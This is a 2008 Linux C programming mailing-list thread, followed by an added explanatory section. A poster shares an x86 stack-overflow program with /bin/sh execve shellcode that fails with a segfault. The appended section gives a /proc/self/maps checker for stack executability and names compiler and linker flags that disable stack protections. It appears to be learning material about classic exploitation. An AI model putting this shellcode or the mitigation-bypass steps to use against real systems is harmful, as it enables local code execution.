From: ninjaboy
Subject: Re: buffer overflow
Date: Tue, 11 Mar 2008 13:12:29 +0100
References: <47D621E6.1090403@linux.vnet.ibm.com> <1205229858.4033.12.camel@debian.nordiclan.net> <47D661D0.90905@linux.vnet.ibm.com> <1205237049.28040.0.camel@debian.nordiclan.net>
In-Reply-To: <1205237049.28040.0.camel@debian.nordiclan.net>
To: "Patrik Båt, RTL"
Cc: Varun Chandramohan, linux-c-programming@vger.kernel.org

2008/3/11, Patrik Båt, RTL:
> Yeah, maybe some hardcore C coder in here can help you more...
>
> My primary "tip of the day" was strace ;)
>
>
> Tue 2008-03-11 at 16:11 +0530, Varun Chandramohan wrote:
> > Patrik Båt wrote:
> > > Tue 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
> > >
> > >> Hi all,
> > >>
> > >> Can someone tell me what is wrong with this program? All I
> > >> get is a seg fault. I am trying to create a stack overflow and exec a
> > >> shell. Somehow it's not working. The system is x86 on Linux.
> > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> > >> Copyright (C) 2006 Free Software Foundation, Inc.
> > >> This is free software; see the source for copying conditions. There is NO
> > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> > >>
> > >>
> > >>
> > >> The Code:
> > >> #include <stdio.h>
> > >> #include <string.h>
> > >>
> > >> char shellcode[] =
> > >>     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> > >>     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> > >>     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> > >> #if 0
> > >> char shellcode[] =
> > >>     "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
> > >>     "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
> > >>     "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
> > >>     "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> > >>
> > >> #endif
> > >>
> > >> char large_string[128];
> > >> int main() {
> > >>     char buffer[96];
> > >>     int i;
> > >>     long *long_ptr = (long *) large_string;
> > >>     memset(&buffer, 0, sizeof(buffer));
> > >>
> > >>     for (i = 0; i < 32; i++)
> > >>         *(long_ptr + i) = (long)&buffer;
> > >>
> > >>     for (i = 0; i < strlen(shellcode); i++)
> > >>         large_string[i] = shellcode[i];
> > >>
> > >>     strcpy(buffer, large_string);
> > >>
> > > strcpy(large_string, buffer);
> > >
> > > //This is working tho...
> > >
> > Thanks for the reply, but this doesn't spawn a shell, does it? This
> > simply avoids the SIGSEGV.
> > >> }

Maybe stack is not executable?

-- 
noone is alone.
--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
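The question ninjaboy raises (is the stack executable?) can be answered from inside the process by reading the permission column of /proc/self/maps. The program below is an added example, not code from this thread or from any of its participants: it parses a maps listing and reports whether the mapping tagged [stack] (or any other mapping, so it also answers the same question for the heap or a library) carries the x bit. It assumes the Linux /proc/<pid>/maps line format; the two listings embedded in it are constructed samples, not real captures, and on a host without /proc it only evaluates those samples.

```c
/*
 * Added example (not part of the thread): decide whether a mapping of a Linux
 * process is executable by reading the permission column of /proc/<pid>/maps.
 * A line of that file looks like
 *
 *   bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]
 *
 * The second column is the permission string; an 'x' in it means the CPU is
 * allowed to fetch instructions from the region, which is what returning into
 * shellcode placed in a stack buffer requires.
 *
 * Build: gcc -std=c99 -Wall -o stackcheck stackcheck.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample listings (not real captures) in /proc/<pid>/maps format. */
static const char SAMPLE_NX_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 1234       /tmp/a.out\n"
    "08049000-0804a000 rw-p 00001000 08:01 1234       /tmp/a.out\n"
    "b7e00000-b7f20000 r-xp 00000000 08:01 5678       /lib/libc.so.6\n"
    "bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]\n";

static const char SAMPLE_EXECSTACK_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 1234       /tmp/a.out\n"
    "bffeb000-c0000000 rwxp 00000000 00:00 0          [stack]\n";

/* Return 1 if the first mapping whose line contains `tag` (e.g. "[stack]",
 * "[heap]", "libc") is executable, 0 if it is mapped without 'x', and -1 if
 * no line carries that tag. */
int mapping_is_executable(const char *maps_text, const char *tag)
{
    const char *p = maps_text;

    while (*p) {
        char line[512];
        const char *eol = strchr(p, '\n');
        size_t full = eol ? (size_t)(eol - p) : strlen(p);
        size_t len = full < sizeof line - 1 ? full : sizeof line - 1;

        /* copy one line so strstr/sscanf see a terminated string */
        memcpy(line, p, len);
        line[len] = '\0';
        p += full;
        if (*p == '\n')
            p++;

        if (strstr(line, tag) == NULL)
            continue;

        /* columns: start-end perms offset dev inode pathname */
        char range[64], perms[8];
        if (sscanf(line, "%63s %7s", range, perms) != 2)
            return -1;
        return strchr(perms, 'x') != NULL;
    }
    return -1;
}

/* The specific question from the thread. */
int stack_is_executable(const char *maps_text)
{
    return mapping_is_executable(maps_text, "[stack]");
}

int main(void)
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");

    if (f == NULL) {
        puts("no /proc/self/maps here (not Linux?); using constructed samples");
        printf("sample NX stack:   %d\n", stack_is_executable(SAMPLE_NX_MAPS));
        printf("sample exec stack: %d\n", stack_is_executable(SAMPLE_EXECSTACK_MAPS));
        return 0;
    }
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';

    int r = stack_is_executable(buf);
    printf("this process: stack %s\n",
           r == 1 ? "is executable (shellcode in a stack buffer can run)"
         : r == 0 ? "is NOT executable (returning into buffer will SIGSEGV)"
                  : "line not found");
    return 0;
}
```

The same fact can be read off the binary without running it: `readelf -lW ./a.out | grep GNU_STACK` shows RWE for an executable stack and RW for a non-executable one, and `gcc -z execstack` relinks the posted program with the RWE marking. Two other things in a Red Hat gcc 4.1 toolchain can independently produce the reported SIGSEGV before any shellcode runs: the stack protector (disabled with `-fno-stack-protector`) and address-space randomisation, which moves `&buffer` between runs; with randomisation the address the posted program writes into large_string at compile-run time is still the right one because it is taken at run time, but the check here only settles the executability question.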